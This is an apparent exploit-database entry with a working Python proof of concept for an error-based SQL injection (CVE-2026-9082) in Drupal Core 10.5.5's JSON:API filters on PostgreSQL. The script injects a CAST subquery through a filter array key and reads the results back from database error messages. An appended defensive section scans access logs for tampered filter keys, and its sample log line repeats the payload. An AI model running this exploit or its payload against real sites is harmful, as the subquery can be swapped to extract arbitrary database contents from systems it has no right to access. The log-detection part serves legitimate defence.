
Exploit Title: Drupal Core 10.5.5 - Error-Based SQL Injection
Google Dork: N/A
Date: 2026-05-31
Exploit Author: cardosource
Vendor Homepage: https://www.drupal.org
Software Link: https://www.drupal.org/project/drupal
Version: Drupal Core 10.5.5
Tested on: Debian Linux (Docker), PHP 8.2, Apache, PostgreSQL 17
CVE: CVE-2026-9082

Description:

This proof-of-concept demonstrates an Error-Based SQL Injection in Drupal Core 10.5.5 (PostgreSQL). User-controlled JSON:API filter array keys influence SQL query construction, allowing database information disclosure through SQL error messages.

import requests
import json

TARGET_URL = "http://localhost:8080/jsonapi/node/article"

BANNER = """
[+] Drupal Core 10.5.5 - Error-Based SQL Injection
[+] CVE-2026-9082
[+] Target: JSON:API (PostgreSQL)
"""


def extract_data(subquery):
    headers = {
        "Accept": "application/vnd.api+json",
        "Content-Type": "application/vnd.api+json",
    }
    # The subquery result is forced through CAST(... AS INTEGER) so that
    # PostgreSQL echoes it back inside an "invalid input syntax" error.
    payload = f"0||CAST(({subquery}) AS INTEGER)"
    # The payload sits in the array *key* of the filter value; that key is the
    # user-controlled input that reaches the query builder.
    params = {
        "filter[my_filter][condition][path]": "title",
        "filter[my_filter][condition][operator]": "IN",
        "filter[my_filter][condition][value][0]": "Example",
        f"filter[my_filter][condition][value][{payload}]": "Injection",
    }
    try:
        response = requests.get(TARGET_URL, headers=headers, params=params, timeout=10)
        if response.status_code == 500:
            try:
                # JSON:API returns errors as a list; the database message is in "detail".
                error = response.json().get("errors", [{}])[0].get("detail", "")
                if "invalid input syntax" in error:
                    # The offending value is quoted inside the PostgreSQL error text.
                    data = error.split('"')[1] if '"' in error else error
                    print(f"\033[92m[SUCCESS]\033[0m {data}")
            except json.JSONDecodeError:
                pass
    except requests.exceptions.RequestException:
        pass


if __name__ == "__main__":
    print(BANNER)
    extract_data("SELECT version()")
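A defender-side check, added here as an example and not part of the original PoC: it scans web-server access log lines (constructed samples below) for JSON:API `filter[...][condition][value][<index>]` keys whose index is not a plain array position, which is the key tampering this PoC relies on, and reports the client, response status and offending indexes. The combined-log regex and the `/jsonapi/` path prefix are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# JSON:API filter value keys look like filter[<name>][condition][value][<index>];
# <index> should be a plain array position, so anything else deserves a look.
VALUE_KEY_RE = re.compile(r"^filter\[[^\]]+\]\[condition\]\[value\]\[(?P<index>[^\]]*)\]$")
# Pulls client IP, request target and status out of an Apache/nginx combined log
# line (assumed format).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def suspicious_value_indexes(request_target):
    """Return filter value-array indexes in a request target that are not non-negative integers."""
    query = urlsplit(request_target).query
    findings = []
    for key, _value in parse_qsl(query, keep_blank_values=True):
        match = VALUE_KEY_RE.match(key)
        if match and not match.group("index").isdigit():
            findings.append(match.group("index"))
    return findings


def scan_log(log_text):
    """Return (client_ip, status, indexes) for every JSON:API request with tampered filter keys."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m or not m.group("target").startswith("/jsonapi/"):
            continue
        bad = suspicious_value_indexes(m.group("target"))
        if bad:
            hits.append((m.group("ip"), int(m.group("status")), bad))
    return hits


# Constructed sample log lines: one benign IN filter with two values, and one
# carrying the non-numeric key from the PoC above, URL-encoded as a client sends it.
SAMPLE_LOG = """\
10.0.0.5 - - [31/May/2026:10:00:01 +0000] "GET /jsonapi/node/article?filter%5Bf%5D%5Bcondition%5D%5Bpath%5D=title&filter%5Bf%5D%5Bcondition%5D%5Boperator%5D=IN&filter%5Bf%5D%5Bcondition%5D%5Bvalue%5D%5B0%5D=Example&filter%5Bf%5D%5Bcondition%5D%5Bvalue%5D%5B1%5D=Other HTTP/1.1" 200 1234
10.0.0.9 - - [31/May/2026:10:00:02 +0000] "GET /jsonapi/node/article?filter%5Bf%5D%5Bcondition%5D%5Bpath%5D=title&filter%5Bf%5D%5Bcondition%5D%5Boperator%5D=IN&filter%5Bf%5D%5Bcondition%5D%5Bvalue%5D%5B0%5D=Example&filter%5Bf%5D%5Bcondition%5D%5Bvalue%5D%5B0%7C%7CCAST((SELECT%20version())%20AS%20INTEGER)%5D=Injection HTTP/1.1" 500 512
"""

if __name__ == "__main__":
    for ip, status, indexes in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} non-numeric value keys: {indexes}")
```

A 500 paired with such a key is the error-based pattern described above; the same index check can be applied at a reverse proxy before the request reaches Drupal.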
